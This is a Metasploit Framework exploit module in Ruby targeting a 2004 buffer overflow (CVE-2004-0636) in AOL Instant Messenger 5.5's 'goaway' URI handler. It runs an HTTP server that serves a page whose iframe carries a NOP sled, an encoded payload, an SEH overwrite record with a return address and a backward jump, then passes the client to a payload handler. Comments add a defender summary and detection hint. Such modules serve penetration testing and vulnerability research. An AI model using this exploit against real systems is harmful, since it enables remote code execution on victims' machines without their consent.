GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/aim_goaway.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server and exploits an SEH overwrite
  #
  # Summary for defenders, taken from the metadata and the request handler
  # below:
  # - Affected software: AOL Instant Messenger 5.5 (CVE-2004-0636, BID 10889,
  #   OSVDB 8398), through its 'goaway' URI handler and an overly sized
  #   'message' parameter (see 'Description').
  # - Delivery: the module answers an HTTP request with an HTML page whose
  #   <iframe> src is an aim:goaway?message=... URI (see on_request_uri); it
  #   relies on the client dispatching that URI to the aim: handler, which is
  #   where the overflow is described as occurring.
  # - Detection hint: an HTTP response (or proxy/IDS log) carrying an
  #   aim:goaway?message= URI with an unusually long value matches the page
  #   this module serves.
  # - Mitigation: 'Description' names AIM 5.5 as affected; the vendor
  #   advisory in 'References' is the authoritative source for fixed builds
  #   (not stated in this file — confirm there).
  #
  include Msf::Exploit::Seh
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module's metadata with the framework.
  #
  # @param info [Hash] caller-supplied module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AOL Instant Messenger goaway Overflow',
        'Description' => %q{
          This module exploits a flaw in the handling of AOL Instant
          Messenger's 'goaway' URI handler. An attacker can execute
          arbitrary code by supplying an overly sized buffer as the
          'message' parameter. This issue is known to affect AOL Instant
          Messenger 5.5.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'skape',
          'thief <thief[at]hick.org>'
        ],
        'References' => [
          [ 'CVE', '2004-0636' ],
          [ 'OSVDB', '8398' ],
          [ 'BID', '10889'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],
        ],
        'Payload' => {
          # 1014 is also hard-coded in on_request_uri when sizing the NOP
          # sled; the two values must be kept in step.
          'Space' => 1014,
          'MaxNops' => 1014,
          # Bytes the encoder must avoid. on_request_uri places the encoded
          # payload verbatim inside a single-quoted HTML attribute that holds
          # a URI, so this set covers NUL, whitespace, both quote characters
          # and the URI/HTML metacharacters (% & + / : < > ? @) — presumably
          # to keep that attribute and URI intact; confirm before changing.
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
          'StackAdjustment' => -3500,
        },
        'Platform' => %w{win},
        'Targets' => [
          # Target 0: Automatic
          [
            'Windows NT/2000/XP/2003 Automatic',
            {
              'Platform' => 'win',
              # Address consumed by generate_seh_record in on_request_uri
              'Rets' =>
              [
                0x1108118f, # proto.com: pop/pop/ret
              ],
            },
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2004-08-09',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Serves the exploit page to a connecting client.
  #
  # Invoked by the HttpServer mixin for a request to the module's URI. The
  # byte layout of msg is what the SEH overwrite depends on; do not reorder
  # or resize its parts without revisiting 'Space' and 'Rets' above.
  #
  # @param cli the client connection handed over by the HttpServer mixin
  # @param request the HTTP request; not used by this handler
  # @return [nil]
  def on_request_uri(cli, request)
    # Re-generate the payload for this client; nothing is sent if that fails
    return if ((p = regenerate_payload(cli)) == nil)

    # Build out the message
    msg =
      make_nops(1014 - p.encoded.length) + # NOP sled padding the payload out to 1014 bytes ('Space' above)
      p.encoded + # store the payload
      generate_seh_record(target['Rets'][0]) + # set up the SEH frame with the target's pop/pop/ret address
      "\x90\xe9\x13\xfc\xff\xff" # jmp -1000

    # Build the HTML content; msg is interpolated into the URI without any
    # encoding (the 'BadChars' set above is what keeps the markup well-formed)
    content = "<html><iframe src='aim:goaway?message=#{msg}'></html>"

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload: hand the connection to the payload handler
    handler(cli)
  end
end